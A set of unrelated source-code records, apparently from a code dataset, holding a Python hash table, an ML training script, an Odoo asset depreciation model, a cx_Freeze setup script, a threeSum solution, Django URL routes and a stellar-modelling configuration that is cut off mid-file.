None\n \n def delete(self, key):\n print (\" Deleting item with key '\" + key + \"'\")\n hash = self.hashing(key)\n for i, it in enumerate(self.table[hash]):\n if it.key == key:\n del self.table[hash][i]\n self.count -= 1\n return\n print (\" not in table.\") \n \n def draw(self, compact=True):\n '''\n Prints hash table to the console, example output:\n\n Number of entries: 6\n [3]\n └── five\n [5]\n └── three\n [6]\n ├── one\n ├── two\n └── six\n [7]\n └── four\n\n If compact is set to false all empty entires will be printed as well.\n '''\n\n print (\" Number of entries: \" + str(self.get_count()))\n for i in range(self.table_size):\n\n if compact:\n if len(self.table[i]) != 0:\n print ( \" [\" + str(i) + \"] \" )\n else:\n print ( \" [\" + str(i) + \"] \" )\n\n for j in range(len(self.table[i])):\n if j == len(self.table[i])-1:\n print(\" └── \" + self.table[i][j].key)\n else:\n print(\" ├── \" + self.table[i][j].key)\n \n def get_count(self):\n return self.count\n \nif __name__ == \"__main__\":\n hs = HashTable(50)\n\n hs.insert(Item(\"one\"))\n hs.insert(Item(\"two\"))\n hs.insert(Item(\"three\"))\n hs.insert(Item(\"four\"))\n hs.insert(Item(\"five\"))\n hs.insert(Item(\"six\"))\n hs.draw()","sub_path":"data_structures/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"164113371","text":"import os\nimport pprint\nimport argparse\nimport itertools\nfrom utils import build_directory\nfrom stored_dictionaries.default import default_params\n\n# set random seeds\nimport numpy as np\nnp.random.seed(0)\nfrom tensorflow import set_random_seed\nset_random_seed(0)\n\nimport sys\nsys.path.append('../')\nsys.path.append('../../../')\nimport numpy as np\n\n# from cbrain.imports import *\nfrom cbrain.data_generator import *\nfrom cbrain.utils import limit_mem\nfrom stored_dictionaries.data_options import data_opts\n\nfrom model import Network\nfrom cbrain.model_diagnostics import ModelDiagnostics\n\nparser = argparse.ArgumentParser()\n# ---------------- Important parameters -------------------------\nparser.add_argument('--loss_type', type=str, default='mse', choices=['mse', 'weak_loss'], help='What to run?')\nparser.add_argument('--net_type', type=str, default='normal', choices=['normal', 'conservation'], help='What to run?')\nparser.add_argument('--data', type=str, choices=['fluxbypass_aqua', 'land_data', '8col', '32col'])\n# params okay left as 
defaults\nparser.add_argument('--batch_size', type=int, default=2048, help='Batch size')\nparser.add_argument('--data_dir', type=str, default='/baldig/chemistry/earth_system_science/')\nparser.add_argument('--epochs', type=int, default=18, help='Number of epochs used for training')\nparser.add_argument('--patience', type=int, default=10, help='How long to wait for an improvement')\nparser.add_argument('--alg', default='baseline')\nFLAGS = parser.parse_args()\n\noutput_path = 'SherpaResults/baselines/{data}/{net_type}_{loss_type}/'.format(\n data=FLAGS.data,\n net_type=FLAGS.net_type,\n loss_type=FLAGS.loss_type,\n)\nmodels_path = output_path + 'Models/'\n\nbuild_directory(models_path)\n\n# Otherwise tensorflow will use ALL your GPU RAM for no reason\nlimit_mem()\n\nargs = vars(FLAGS)\nargs.update(default_params[FLAGS.data])\n\npp = pprint.PrettyPrinter(indent=4)\npp.pprint(args)\n\nif args['data'] == 'fluxbypass_aqua':\n PREFIX = '8col009_01_'\n DATADIR = args['data_dir'] + args['data'] + '/'\n\n scale_dict = load_pickle(DATADIR + '009_Wm2_scaling.pkl'); in_vars = load_pickle(DATADIR + '009_Wm2_in_vars.pkl')\n out_vars = load_pickle(DATADIR + '009_Wm2_out_vars.pkl'); dP = load_pickle(DATADIR + '009_Wm2_dP.pkl')\n\n train_gen = DataGenerator(\n data_fn = DATADIR+PREFIX+'train.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = DATADIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict,\n batch_size=args['batch_size'],\n shuffle=True\n )\n\n valid_gen = DataGenerator(\n data_fn = DATADIR+PREFIX+'valid.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = DATADIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict,\n batch_size=args['batch_size'],\n shuffle=False\n )\n\n net = Network(args, 1,\n \tscale_dict=scale_dict,\n \tsub=train_gen.input_transform.sub,\n \tdiv=train_gen.input_transform.div\n )\nelse:\n from data_generator import DataGenerator\n\n train_gen = DataGenerator(\n data_dir=args['data_dir'] + args['data'] + '/',\n feature_fn=data_opts[args['data']]['train']['feature_fn'],\n target_fn=data_opts[args['data']]['train']['target_fn'],\n batch_size=args['batch_size'],\n norm_fn=data_opts[args['data']]['norm_fn'],\n fsub='feature_means',\n fdiv='feature_stds',\n tmult='target_conv',\n shuffle=True,\n )\n\n valid_gen = DataGenerator(\n data_dir=args['data_dir'] + args['data'] + '/',\n feature_fn=data_opts[args['data']]['test']['feature_fn'],\n target_fn=data_opts[args['data']]['test']['target_fn'],\n batch_size=args['batch_size'],\n norm_fn=data_opts[args['data']]['norm_fn'],\n fsub='feature_means',\n fdiv='feature_stds',\n tmult='target_conv',\n shuffle=False,\n )\n\n net = Network(args, 1)\n\n# save lr model\nnet.save()\nnet.train(train_gen, valid_gen)\n","sub_path":"notebooks/tbeucler_devlog/hp_opt_conservation/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"588452115","text":"# -*- coding: utf-8 -*-\n# (C) 2013 Smile ()\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import RedirectWarning, ValidationError\n\nfrom .account_asset_asset import ACCOUNT_GROUPS\n\n\nclass AccountAssetDepreciationLine(models.Model):\n _name = 'account.asset.depreciation.line'\n _description = 'Asset Depreciation Line'\n\n 
@api.model_cr\n def init(self):\n super(AccountAssetDepreciationLine, self).init()\n self._cr.execute(\"\"\"\n SELECT * FROM pg_proc WHERE proname = 'last' AND proisagg;\"\"\")\n if not self._cr.fetchall():\n self._cr.execute(\"\"\"\n-- Create a function that always returns the last non-NULL item\nCREATE OR REPLACE FUNCTION public.last_agg ( anyelement, anyelement )\nRETURNS anyelement LANGUAGE sql IMMUTABLE STRICT AS $$\n SELECT $2;\n$$;\n\n-- And then wrap an aggregate around it\nCREATE AGGREGATE public.last (\n sfunc = public.last_agg,\n basetype = anyelement,\n stype = anyelement\n);\"\"\")\n\n asset_id = fields.Many2one(\n 'account.asset.asset', 'Asset', required=True, ondelete='cascade',\n index=True, auto_join=True)\n depreciation_type = fields.Selection([\n ('accounting', 'Accounting'),\n ('fiscal', 'Fiscal'),\n ('exceptional', 'Exceptional'),\n ], 'Type', required=True, index=True, default='exceptional')\n depreciation_date = fields.Date(\n 'Date', required=True, default=fields.Date.today)\n active = fields.Boolean(default=True)\n company_id = fields.Many2one(\n related='asset_id.company_id', store=True,\n readonly=True, index=True)\n currency_id = fields.Many2one(\n related='asset_id.currency_id', store=True, readonly=True)\n category_id = fields.Many2one(\n related='asset_id.category_id', store=True, readonly=True)\n state = fields.Selection(\n related='asset_id.state', store=True, readonly=True)\n asset_type = fields.Selection(\n related='asset_id.asset_type', store=True, readonly=True)\n benefit_accelerated_depreciation = fields.Boolean(\n related='asset_id.benefit_accelerated_depreciation',\n store=True, readonly=True)\n base_value = fields.Monetary('Base Amount', readonly=True)\n previous_years_accumulated_value = fields.Monetary(\n 'Previous Years Accumulated Depreciation',\n readonly=True, group_operator=\"last\")\n previous_years_accumulated_value_sign = fields.Monetary(\n 'Previous Years Accumulated Depreciation',\n compute='_get_accumulated_value_sign', store=True)\n current_year_accumulated_value = fields.Monetary(\n 'Current Year Accumulated Depreciation',\n readonly=True, group_operator=\"last\")\n current_year_accumulated_value_sign = fields.Monetary(\n 'Current Year Accumulated Depreciation',\n compute='_get_accumulated_value_sign', store=True)\n depreciation_value = fields.Monetary('Depreciation')\n depreciation_value_sign = fields.Monetary(\n 'Depreciation', compute='_get_accumulated_value_sign', store=True)\n accumulated_value = fields.Monetary(\n 'Accumulated Depreciation', readonly=True)\n exceptional_value = fields.Monetary(\n 'Exceptional Depreciation', readonly=True)\n exceptional_value_sign = fields.Monetary(\n 'Exceptional Depreciation',\n compute='_get_accumulated_value_sign', store=True)\n book_value = fields.Monetary('Book value', readonly=True)\n book_value_sign = fields.Monetary(\n 'Book value', compute='_get_accumulated_value_sign', store=True)\n book_value_wo_exceptional = fields.Monetary(\n 'Book value at end without exceptional', readonly=True)\n move_id = fields.Many2one(\n 'account.move', 'Depreciation Entry',\n readonly=True, ondelete='restrict')\n accounting_value = fields.Monetary(\n 'Accounting Depreciation',\n compute='_get_depreciation_values', store=True)\n accelerated_value = fields.Monetary(\n 'Accelerated Depreciation',\n compute='_get_depreciation_values', store=True)\n purchase_value = fields.Monetary(\n 'Gross Value', related='asset_id.purchase_value',\n store=True, readonly=True)\n purchase_value_sign = fields.Monetary(\n 'Gross 
Value', compute='_get_accumulated_value_sign', store=True)\n salvage_value = fields.Monetary(\n 'Salvage Value', related='asset_id.salvage_value',\n store=True, readonly=True)\n salvage_value_sign = fields.Monetary(\n 'Salvage Value', compute='_get_accumulated_value_sign', store=True)\n year = fields.Char(\"Year\", compute='_get_year', store=True)\n account_id = fields.Many2one(\n 'account.account', 'Account', compute='_get_account', store=True)\n is_posted = fields.Boolean(\n 'Posted Depreciation',\n compute='_get_is_posted', inverse='_set_is_posted', store=True)\n is_posted_forced = fields.Boolean(readonly=True)\n is_manual = fields.Boolean(\n 'Manual Depreciation', compute='_get_is_manual', store=True)\n\n @api.one\n @api.depends('previous_years_accumulated_value',\n 'current_year_accumulated_value',\n 'depreciation_value', 'book_value',\n 'purchase_value', 'exceptional_value',\n 'salvage_value', 'asset_id.asset_type')\n def _get_accumulated_value_sign(self):\n sign = self.asset_id.asset_type == 'purchase_refund' and -1 or 1\n self.previous_years_accumulated_value_sign = \\\n self.previous_years_accumulated_value * sign\n self.current_year_accumulated_value_sign = \\\n self.current_year_accumulated_value * sign\n self.depreciation_value_sign = self.depreciation_value * sign\n self.book_value_sign = self.book_value * sign\n self.purchase_value_sign = self.purchase_value * sign\n self.exceptional_value_sign = self.exceptional_value * sign\n self.salvage_value_sign = self.salvage_value * sign\n\n @api.one\n @api.depends('depreciation_date', 'company_id.fiscalyear_start_day')\n def _get_year(self):\n self.year = self.depreciation_date[:4]\n if self.depreciation_date[5:] < self.company_id.fiscalyear_start_day:\n self.year = str(int(self.year) - 1)\n\n @api.one\n @api.depends('depreciation_type',\n 'category_id.accounting_depreciation_account_id',\n 'category_id.exceptional_depreciation_account_id',\n 'company_id.fiscal_depreciation_account_id')\n def _get_account(self):\n if self.depreciation_type == 'fiscal':\n self.account_id = self.company_id.fiscal_depreciation_account_id\n else:\n self.account_id = self.category_id['%s_depreciation_account_id'\n % self.depreciation_type]\n\n @api.one\n @api.depends('is_posted_forced', 'move_id')\n def _get_is_posted(self):\n self.is_posted = self.is_posted_forced or bool(self.move_id)\n\n @api.one\n def _set_is_posted(self):\n self.is_posted_forced = self.is_posted\n\n @api.one\n @api.depends('depreciation_type',\n 'asset_id.accounting_method',\n 'asset_id.fiscal_method')\n def _get_is_manual(self):\n if self.depreciation_type == 'exceptional':\n self.is_manual = True\n else:\n self.is_manual = self.asset_id[\n '%s_method' % self.depreciation_type] == 'manual'\n\n @api.one\n @api.depends('depreciation_date', 'depreciation_value')\n def _get_depreciation_values(self):\n if self.depreciation_type == 'fiscal':\n self.accounting_value = self.asset_id.depreciation_line_ids. 
\\\n filtered(\n lambda line: line.depreciation_type == 'accounting' and\n line.depreciation_date == self.depreciation_date\n ).depreciation_value\n self.accelerated_value = self.depreciation_value - \\\n self.accounting_value\n\n @api.one\n @api.constrains('depreciation_value', 'book_value',\n 'book_value_wo_exceptional')\n def _check_constraints(self):\n if self.depreciation_value > self.asset_id.purchase_value:\n raise ValidationError(_(\n 'Depreciation value cannot be bigger than gross value!'))\n if self.book_value > self.book_value_wo_exceptional:\n raise ValidationError(_(\n 'Book value with exceptional depreciations '\n 'cannot be superior to book value '\n 'without exceptional depreciations, '\n 'nor inferior to salvage value!'))\n\n @api.multi\n def button_validate_exceptional_depreciation(self):\n self.validate_exceptional_depreciation()\n return {'type': 'ir.actions.act_window_close'}\n\n @api.multi\n def validate_exceptional_depreciation(self):\n self.mapped('asset_id').compute_depreciation_board()\n return self.post_depreciation_line()\n\n @api.multi\n def write(self, vals):\n if 'active' in vals and not vals.get('active'):\n self._reverse_move(vals)\n return super(AccountAssetDepreciationLine, self).write(vals)\n\n @api.multi\n def _reverse_move(self, vals):\n lines_to_reverse = self.browse()\n if vals.get('is_posted') or vals.get('move_id') or \\\n vals.get('is_posted_forced'):\n lines_to_reverse = self\n elif 'is_posted' not in vals and 'move_id' not in vals and \\\n 'is_posted_forced' not in vals:\n lines_to_reverse = self.filtered(lambda line: line.is_posted)\n if lines_to_reverse:\n lines_to_reverse.with_context(daily_amortization=True). \\\n post_depreciation_line(reverse=True)\n\n @api.multi\n def post_depreciation_line(self, reverse=False):\n if not self:\n return True\n moves = self.env['account.move']\n for line in self:\n if (not line.depreciation_value or line.is_posted) and \\\n not reverse and not self._context.get('asset_output'):\n continue\n if line.depreciation_type == 'fiscal' and \\\n not line.asset_id.benefit_accelerated_depreciation:\n continue\n vals = line._get_move_vals(reverse)\n if vals['line_ids']:\n move = moves.create(vals)\n moves |= move\n if not self._context.get('asset_output'):\n if not line.move_id:\n line.move_id = move\n if not reverse and line.depreciation_type == 'accounting' \\\n and line.book_value != \\\n line.book_value_wo_exceptional:\n vals = line._get_move_vals(\n reverse, 'from_depreciation')\n if vals['line_ids']:\n moves.create(vals)\n vals = line._get_move_vals(\n reverse, 'to_exceptional_amortization')\n if vals['line_ids']:\n moves.create(vals)\n return moves.post()\n\n @api.multi\n def _get_move_vals(self, reverse=False, transfer=None):\n self.ensure_one()\n move_date = self.depreciation_date\n if self._context.get('force_account_move_date'):\n move_date = self._context['force_account_move_date']\n elif self.asset_id.in_service_account_date and \\\n self.depreciation_date < self.asset_id.in_service_account_date:\n move_date = fields.Date.to_string(fields.Date.from_string(\n self.asset_id.in_service_account_date) +\n relativedelta(day=1, months=1) + relativedelta(days=-1))\n msg = _('%s Amortization' % self.depreciation_type.capitalize())\n if transfer:\n msg = _('Exceptional Amortization')\n narration = '%s%s: %s - %s' % (\n self._context.get('asset_output_msg', ''), msg,\n self.asset_id.name, self.depreciation_date)\n journal = self.category_id.depreciation_journal_id or \\\n self.category_id.asset_journal_id\n vals = 
{\n 'name': journal.sequence_id.\n with_context(ir_sequence_date=move_date).next_by_id(),\n 'narration': narration,\n 'ref': self.asset_id.code,\n 'date': move_date,\n 'journal_id': journal.id,\n 'company_id': self.company_id.id,\n }\n vals['line_ids'] = [\n (0, 0, x)\n for x in self._get_move_line_vals(vals.copy(), reverse, transfer)]\n return vals\n\n @api.multi\n def _get_move_line_vals(self, default=None, reverse=False, transfer=None):\n self.ensure_one()\n amount = self.depreciation_value\n main_related_object = self.category_id\n second_related_object = None\n depreciation_type = '%s_depreciation' % self.depreciation_type\n if transfer:\n depreciation_type = 'exceptional_amortization'\n account_field = '%s_account_id' % depreciation_type\n expense_account_field = '%s_expense_account_id' % \\\n depreciation_type\n income_account_field = '%s_income_account_id' % \\\n depreciation_type\n if self.depreciation_type == 'fiscal':\n if not self.company_id[expense_account_field] or \\\n not self.company_id[income_account_field] or \\\n not self.company_id[account_field]:\n raise RedirectWarning(\n _('Please indicate fiscal amortization '\n 'accounts in company form!'),\n self.env.ref('base.action_res_company_form').id,\n _('Go to company configuration screen'))\n amount = self.accelerated_value\n main_related_object = self.company_id\n if transfer:\n if not self.company_id[expense_account_field] or \\\n not self.company_id[income_account_field]:\n raise RedirectWarning(\n _('Please indicate exceptional amortization '\n 'accounts in company form!'),\n self.env.ref('base.action_res_company_form').id,\n _('Go to company configuration screen'))\n # INFO: always >= 0.0 by defintion, see French law\n amount = self.book_value_wo_exceptional - self.book_value\n second_related_object = self.company_id\n if transfer == 'from_depreciation':\n account_field = 'exceptional_depreciation_account_id'\n elif transfer == 'to_exceptional_amortization':\n amount *= -1.0\n account_field = 'accounting_depreciation_account_id'\n if self._context.get('force_account_move_amount'):\n amount = self._context['force_account_move_amount']\n if not amount:\n return []\n debit, credit = 0.0, abs(amount)\n if (self.asset_type == 'purchase_refund') ^ ((amount < 0.0) ^ reverse):\n debit, credit = abs(credit), abs(debit)\n default = default or {}\n default.update({\n 'partner_id': self.asset_id.supplier_id.id,\n 'currency_id': self.currency_id.id,\n })\n depreciation_line_vals = default.copy()\n depreciation_line_vals.update({\n 'debit': debit,\n 'credit': credit,\n 'account_id': main_related_object[account_field].id,\n 'analytic_account_id':\n self.category_id.asset_analytic_account_id.id,\n 'asset_id': self.asset_id.id,\n })\n expense_or_income_line_vals = default.copy()\n related_object = second_related_object or main_related_object\n account_field = amount > 0 and expense_account_field or \\\n income_account_field\n expense_or_income_line_vals.update({\n 'debit': credit,\n 'credit': debit,\n 'account_id': related_object[account_field].id,\n })\n return [depreciation_line_vals, expense_or_income_line_vals]\n\n @api.multi\n def _transfer_from_accounts_to_others(\n self, accounts_group, old_accounts, new_accounts):\n moves = self.env['account.move']\n last_depreciation_line_by_asset = {}\n for depreciation_line in self:\n amount_field = 'depreciation_value'\n if depreciation_line.depreciation_type == 'fiscal':\n amount_field = 'accelerated_value'\n last_depreciation_line_by_asset[depreciation_line.asset_id] = \\\n 
depreciation_line, depreciation_line[amount_field]\n context = {'force_account_move_date': fields.Date.today()}\n for depreciation_line, amount in \\\n last_depreciation_line_by_asset.values():\n context['force_account_move_amount'] = amount\n transfer_groups = ['']\n if accounts_group == 'exceptional_amortization':\n transfer_groups = ['from_depreciation',\n 'to_exceptional_amortization']\n for transfer in transfer_groups:\n vals = depreciation_line.with_context(**context). \\\n _get_move_vals(transfer=transfer)\n new_line_vals = []\n for i, j, line_vals in vals['line_ids']:\n for account, group in ACCOUNT_GROUPS.items():\n if group == accounts_group and \\\n account in old_accounts and \\\n line_vals['account_id'] == \\\n old_accounts[account]:\n transfer_vals = line_vals.copy()\n transfer_vals['account_id'] = new_accounts[account]\n line_vals['debit'], line_vals['credit'] = \\\n line_vals['credit'], line_vals['debit']\n new_line_vals.extend(\n [(0, 0, transfer_vals), (0, 0, line_vals)])\n break\n vals['line_ids'] = new_line_vals\n moves |= moves.create(vals)\n return moves.post() if moves else True\n","sub_path":"smile_account_asset/models/account_asset_depreciation_line.py","file_name":"account_asset_depreciation_line.py","file_ext":"py","file_size_in_byte":18422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50316610","text":"from cx_Freeze import setup, Executable\r\ntarget = Executable(\r\n\tscript=\"pytest.py\",\r\n\t#base=\"Win32GUI\",\r\n\t#compress=False,\r\n\t#copyDependentFiles=True,\r\n\t#appendScriptToExe=True,\r\n\t#appendScriptToLibrary=False,\r\n\ticon=\"report.ico\"\r\n )\r\n\r\n#includefiles=[\"file.ogg\",\"file.png\",etc]\r\n#includes=[]\r\n#excludes=[]\r\n#packages=[]\r\n\r\nsetup(\r\n name=\"PyTest\",\r\n version=\"1.0\",\r\n description=\"PyTest example\",\r\n author=\"Nikhil Pagote\",\r\n #options={'build_exe': {'excludes':excludes,'packages':packages,'include_files':includefiles}},\r\n executables=[target]\r\n )\r\n \r\n\r\n#pyinstaller.exe --onefile --windowed --icon=app.ico --version-file=version.txt app.py\r\n#pip install --proxy=http://487717:\"password\"@proxy.cognizant.com:6050 nuitka\r\n#nuitka --recurse-on --python-version=3.4 sample.py\r\n#python setup.py build","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"355706211","text":"'''\nCreated on 2017年3月8日\n\n@author: Luke\n'''\n'''\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n nlist =[]\n nums=sorted(nums)\n for i in range(len(nums)):\n for j in range(i+1,len(nums)):\n for k in range(j+1,len(nums)):\n if(nums[i]+nums[j]+nums[k])==0 and [nums[i],nums[j],nums[k]] not in nlist:\n nlist.append([nums[i],nums[j],nums[k]])\n return nlist\n'''\n'''\n先排序\n運用l,r為左右邊界\n和若是比0小則左邊界往右,比0大右邊界往左\n找到合為0後讓左右邊界都跳過同樣的數字在往中間找\n'''\nclass Solution(object):\n def threeSum(self, nums):\n res = []\n nums.sort()\n #print(nums)\n for i in range(len(nums)-2):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n l, r = i+1, len(nums)-1\n while l < r:\n print(\"i=%d,l=%d,r=%d\"%(i,l,r))\n print(\"nums[%d]=%d,nums[%d]=%d,nums[%d]=%d\\n\"%(i,nums[i],l,nums[l],r,nums[r]))\n s = nums[i] + nums[l] + nums[r]\n if s < 0:\n l +=1 \n elif s > 0:\n r -= 1\n else:\n res.append((nums[i], nums[l], nums[r]))\n while l < r and nums[l] == nums[l+1]:\n l += 1\n while l < r and nums[r] 
== nums[r-1]:\n r -= 1\n l += 1; r -= 1\n return res\n \n \n\nexample=Solution()\nprint(example.threeSum([-1, 0, 1, 2, -1, -4])) ","sub_path":"015ThreeSum.py","file_name":"015ThreeSum.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460724953","text":"from django.urls import path\n\nfrom . import views\napp_name = 'sigaa'\nurlpatterns = [\n # url base ../sigaa/\n path('',views.index,name='index'),\n path('dashboard/',views.dashboard,name='dashboard'),\n path('cadastro/',views.cadastro,name='cadastro'),\n path('cadastro/aluno',views.realizarCadastro,name='realizarCadastro'),\n path('dashboard/cadastrarcurso/',views.cadastrarCurso,name='cadastrarcurso'),\n path('dashboard/cadastrarcurso/cadastrar',views.realizarCadastroCurso,name='realizarCadastroCurso'),\n path('dashboard/listarusuarios/',views.listarUsuarios,name='listarUsuarios'),\n path('dashboard/cadastrarusuario/',views.cadastrarUsuario,name='cadastrarUsuario'),\n path('dashboard/cadastrarusuario/usuario',views.realizarCadastroUsuario,name='realizarCadastroUsuario'),\n]","sub_path":"sigaa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"223712587","text":"#!/usr/bin/env python\n# $Id: AIMS_configure.py\n# Author: Daniel R. Reese \n# Copyright (C) Daniel R. Reese and contributors\n# Copyright license: GNU GPL v3.0\n#\n# AIMS is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with AIMS. If not, see .\n#\n\nimport math\n\n######################### Parallelisation ##############################\n# NOTE: this is currently implemented with multiprocessing, which duplicates\n# the memory in each process. 
To be more memory efficient, turn off\n# parallelisation using the \"parallel\" parameter.\nnprocesses = 2 # number of processes (if running in parallel)\nparallel = False #$$$True # specifies whether to run in parallel\n\n######################### EMCEE control parameters #####################\nntemps = 3 #$$$5 # number of temperatures\nnwalkers = 60 #$$$400 # number of walkers (this number should be even)\nnsteps0 = 900 #$$$200 # number of burn-in steps\nnsteps = 1000 #$$$4000 # number of steps\nthin = 10 # thinning parameter (1 out of thin steps will be kept ...)\nthin_comb = 100 # thinning parameter for output linear combinations of models\nPT = True # use parallel tempering?\n\n######################### Initialisation ###############################\ntight_ball = True # initialise with a tight ball around best solution\nmax_iter = 10000 # maximum number of iterations to find walker\n\n# Ranges used around tight ball configuration for walkers.\n# NOTES:\n# - these ranges will be re-centred around the parameters of the\n# best model in the grid\n# - the ranges on parameters related to surface amplitudes will be reset by AIMS\n# - exact names should be used as keys, since AIMS accesses\n# the relevant distributions by using the name as a key.\n# - it doesn't matter if there are supplementary parameters\n# which don't intervene. AIMS will simply ignore them.\n\ntight_ball_range = {}\ntight_ball_range[\"Mass\"] = (\"Gaussian\", [0.0, 0.01])\t# (29/06/16) edited these to 0.005, 0.002, 0.05, 100, 0.1, 0.1, 0.02, 10\ntight_ball_range[\"Z\"] = (\"Gaussian\", [0.0, 0.01])\t# 0.01 0.002 0.05 100 0.5 0.5 0.02 10\ntight_ball_range[\"log_Z\"] = (\"Gaussian\", [0.0, 0.05])\ntight_ball_range[\"X\"] = (\"Gaussian\", [0.0, 0.01])\t# 0.01 0.002 0.05 100 0.5 0.5 0.02 10\n# tight_ball_range[\"log_X\"] = (\"Gaussian\", [0.0, 0.05])\ntight_ball_range[\"Age\"] = (\"Gaussian\", [0.0, 100.0])\ntight_ball_range[\"numax\"] = (\"Gaussian\", [0.0, 0.5])\ntight_ball_range[\"Dnu\"] = (\"Gaussian\", [0.0, 0.5])\ntight_ball_range[\"Radius\"] = (\"Gaussian\", [0.0, 0.01])\ntight_ball_range[\"Teff\"] = (\"Gaussian\", [0.0, 10.0])\ntight_ball_range[\"A_surf\"] = (\"Gaussian\", [0.0, 1.0]) # will be reset by AIMS\ntight_ball_range[\"A3_surf\"] = (\"Gaussian\", [0.0, 1.0]) # will be reset by AIMS\ntight_ball_range[\"Am1_surf\"] = (\"Gaussian\", [0.0, 1.0]) # will be reset by AIMS\n######################### Radial orders ################################\nuse_n = True # use radial orders when comparing observations with models?\nread_n = True # read radial orders from input file?\nassign_n = True # use best model to reassign the radial order?\n # NOTE: this supersedes \"read_n\"\n######################### Constraints ##################################\n# Determines the type of surface correction to include. Options include:\n# - None: don't use any surface corrections\n# - \"Kjeldsen2008\": use surface corrections based on Kjeldsen et al. (2008)\n# - \"Ball2014\": use one-term surface corrections based on Ball & Gizon (2014)\n# - \"Ball2014_2\": use two-term surface corrections based on Ball & Gizon (2014)\nsurface_option = \"Ball2014\"\nb_Kjeldsen2008 = 4.9 # exponent used in the Kjeldsen et al. surface corrections\n\n# Set of seismic constraints to be used. 
Options include:\n# - \"nu\": individual frequencies\n# - \"r02\", \"r01\", \"r10\": various frequency ratios\n# - \"dnu0\": individual large frequency separation using l=0\n# - \"avg_dnu\": average large frequency separation using all l\n# - \"avg_dnu0\": average large frequency separation using l=0\n# - \"input_dnu\": if using with only dnu and no freqs, use this constraint\n# NOTE: combining \"nu\" with the other constraints leads to a (nearly)\n# singular covariance matrix and is not expected to give good\n# results.\n#seismic_constraints = [\"r02\",\"r01\",\"r10\",\"avg_dnu0\",\"nu_min0\",\t\"input_dnu\",\"alt_input_dnu\"]\nseismic_constraints = ['nu']\n\n######################### Weighting ########################################\n# Determines what type of weighting to apply to seismic and classic contraints.\n# Options include:\n# - None: no weighting\n# - \"Absolute\": absolute weight applied to constraints\n# - \"Relative\": weights applied after normalising the classic and seismic\n# constraints to have the same weight.\n# NOTE: even with the relative weighting, classic_weight is kept as absolute.\nweight_option = \"Absolute\"\nseismic_weight = 1.0\nclassic_weight = 1.0\n\n######################### Input ########################################\nwrite_data = False # set this to True if you want to write a\n # binary grid file\nmode_format = \"simple\" # specifies the format of the files with\n # the mode frequencies. Options include:\n # - \"simple\": the original AIMS format\n # - \"agsm\": the agsm format from ADIPLS\nnpositive = True # only save modes with n >= 0 in binary file\ncutoff = 5.0 # remove frequencies above this value times\n # the acoustic cutoff-frequency\nagsm_cutoff = False # if True, only keep frequencies with icase=10010\n # (i.e. below the cutoff frequency as determined\n # by ADIPLS) in agsm files. This test is in\n # addition to the above user-defined cutoff.\nlist_grid = \"list_MESA_ms_improved\" # file with list of models and characteristics.\n # only used when constructing binary file with\n # the model grid (i.e. write_data == True)\ngrid_params = (\"Mass\",\"X\") # primary grid parameters (excluding age)\t<--------- Can only be the values used in the file name - the set global parameters of each track.\n # only used when constructing binary file with\n # the model grid (i.e. write_data == True)\n # These parameters are used to distinguish\n # evolutionary tracks\nbinary_grid = \"grid_MS_MESA\" # binary file with model grid\n # this file is written to if write_data == True\n # this file is read from if write_data = False\n######################### User-defined parameters ######################\n# This variable allows the user to introduce supplementary parameters in\n# addition to the parameters hard-coded in to AIMS. These parameters\n# can then be used as output parameters (see output_params) and/or even\n# as grid parameters used to define evolutionary tracks (see grid_params).\n#\n# This variable must be a list (or tuple) of pairs of strings. The first\n# string corresponds to the name of the variable which should be used, for\n# instance, in the grid_params and output_params variables. The second\n# string is the fancy latex name for this variable. Allowance needs to\n# be made for a prefix and and postfix (hence the two \"%s\"). 
These will\n# be replaced by appropriate strings if, for instance, one asks for the\n# log of this parameter.\n\n#user_params = ()\nuser_params = ((\"Xc\", r'Central hydrogen, $%sX_c%s$'),)#(\"DNl1\", r'Period Spacing, $%sDNl1%s$'),)#(\"mHe\", r'Helium Mass'),)\n#user_params = ((\"Xc\", r'Central hydrogen, $%sX_c%s$'), \\\n# (\"alpha_MLT\", r'Mixing length parameter, $%s\\alpha_{\\mathrm{MLT}}%s$'), \\\n# (\"alpha_semi_conv\", r'Semiconvection parameter, $%s\\alpha_{\\mathrm{semi. conv.}}%s$'))\n######################### Priors ######################################\n# The priors are given in a similar format as the tight-ball ranges above.\n# An important difference is that the relevant probability distributions\n# will not be recentred or renormalised (in the case of surface term\n# amplitudes).\n#\n# NOTES:\n# - exact names should be used as keys, since AIMS accesses\n# the relevant distributions by using the name as a key\n# - it doesn't matter if there are supplementary parameters\n# which don't intervene. AIMS will simply ignore them.\n\npriors = {} # The priors will be defined thanks to this\npriors[\"Mass\"] = 